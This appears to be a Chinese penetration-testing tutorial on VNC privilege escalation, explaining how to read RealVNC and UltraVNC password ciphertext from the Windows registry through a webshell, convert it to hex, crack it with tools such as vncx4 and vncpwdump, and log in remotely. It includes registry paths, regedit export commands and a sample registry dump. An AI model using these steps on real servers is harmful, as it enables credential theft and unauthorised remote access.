当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
VNC 提权
0x01 介绍
0x02 上述利用方式演示
0x03 另外一种方式就是通过大马:
拓展知识
vnc远控提权:
UltraVNC是开源的远程终端模拟软件,在国外应用非常广泛。不走的钟在渗透韩国服务器时遇到UltraVNC,网络中只有读取VNC注册表的提权方法,但UltraVNC测试不成功,本地安装UltraVNC测试,发现它的本地密码破解与VNC只是注册表中的密码位置发生了变化。
利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解(默认端口:5900)
1. 在webshll中读取vnc注册表键值:
RealVNC的注册表路径:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password
UltraVNC的注册表路径:
HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password
2. 读取的是十进制数,需要转换成十六进制如下:
在线转换进制地址链接:https://www.toolfk.com/tool-convert-hexadecimal
十六进制:D7 51 CC 73 31 24 7A 93
十进制: 12 7C EF FA 6E 0B 7A D9
3. 破解vnc密码:vncpwdump.exe D751CC7331247A93
4. 然后在本地安装一个VNC客户端,进行远程连接
1. VNC注册表位置:
regedit -e c:\vnc.txt “HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\”
PS:regedit 是打开注册表。
2. UltraVNC注册表位置:
regedit -e c:\UltraVNC.txt “HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3″
3. C:\>type UltraVNC.txt
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
”DebugMode”=dword:00000000
”DebugLevel”=dword:00000000
”AllowLoopback”=dword:00000000
”LoopbackOnly”=dword:00000000
”DisableTrayIcon”=dword:00000000
”MSLogonRequired”=dword:00000000
”NewMSLogon”=dword:00000000
”UseDSMPlugin”=dword:00000000
”ConnectPriority”=dword:00000000
”DSMPlugin”=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
”FileTransferEnabled”=dword:00000001
”FTUserImpersonation”=dword:00000001
”BlankMonitorEnabled”=dword:00000001
”CaptureAlphaBlending”=dword:00000000
”BlackAlphaBlending”=dword:00000000
”DefaultScale”=dword:00000001
”UseDSMPlugin”=dword:00000000
”DSMPlugin”=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00
”SocketConnect”=dword:00000001
”HTTPConnect”=dword:00000000
”XDMCPConnect”=dword:00000000
”AutoPortSelect”=dword:00000000
”InputsEnabled”=dword:00000001
”LocalInputsDisabled”=dword:00000000
”IdleTimeout”=dword:00000000
”QuerySetting”=dword:00000002
”QueryTimeout”=dword:0000000a
”QueryAccept”=dword:00000000
”LockSetting”=dword:00000000
”RemoveWallpaper”=dword:00000001
”Password”=hex:5f,1f,74,21,f9,e2,15,e9
”AllowShutdown”=dword:00000001
”AllowProperties”=dword:00000001
”AllowEditClients”=dword:00000001
”PortNumber”=dword:00001713
”HTTPPortNumber”=dword:000016af
4. 使用vncx4.exe即可破解密文
参考链接:http://www.007hack.com/?tag=ultravnc%E6%8F%90%E6%9D%83
上传大马成功,因为当前我们的大马没有集成VNC提权,这里我们选择读取注册表,选择vnc4密码,读出十进制数
点击读键值,读取成功
PS:获取密码即可,如果说跟路劲无效什么的,那可能是权限不够,以文本形式打开以后
把读取出来的值,用Windows自带的计算器转换为十六进制
PS:cmd.exe 下输入calc 命令,快速打开计算器
在线转换进制地址链接:https://www.toolfk.com/tool-convert-hexadecimal
使用vncx4.exe 程序破解VNC 密码,命令如下:
vncx4.exe -W
注:输入如上命令后,接着将转换后的十六进制挨个输入,每输入一个都按一次回车
最后使用VNC Viewer 4 工具尝试登陆
输入破解的密码,点击确定。成功登陆
参考链接:https://www.cnblogs.com/milantgh/p/3601826.html?utm_source=tuicool
这二个目录有关于vnc安装的信息,有此目录代表服务器安装了vnc
C:\Program Files\RealVNC\VNC4
C:\Documents and Settings\All Users\「开始」菜单\程序\RealVNC
Vnc开发的端口为5900 密码存放在注册表中 地址为
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password (vnc4密码在这个键值里)
HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber (vnc4的端口)
HKCU\Software\ORL\WinVNC3\Password (vnc3的密码)
HKCU\Software\ORL\WinVNC3\PortNumber (vnc3的端口)
大概思路:
1. 找到vnc4.0版本的注册表键值,
2. 然后转换成16进制
3. 用vncx4破解
4. 本地安装vnc
5. 本地连接
密码的破解:
cmd切换到vnc4的目录
命令行录入:vncx4 -W
备注:此处参数W是大写
然后顺序录入上面的每一个十六进制数据,每录完一个回车一次就行了。
参考链接:https://www.cnblogs.com/xishaonian/p/6031556.html
我不需要自由,只想背着她的梦
一步步向前走,她给的永远不重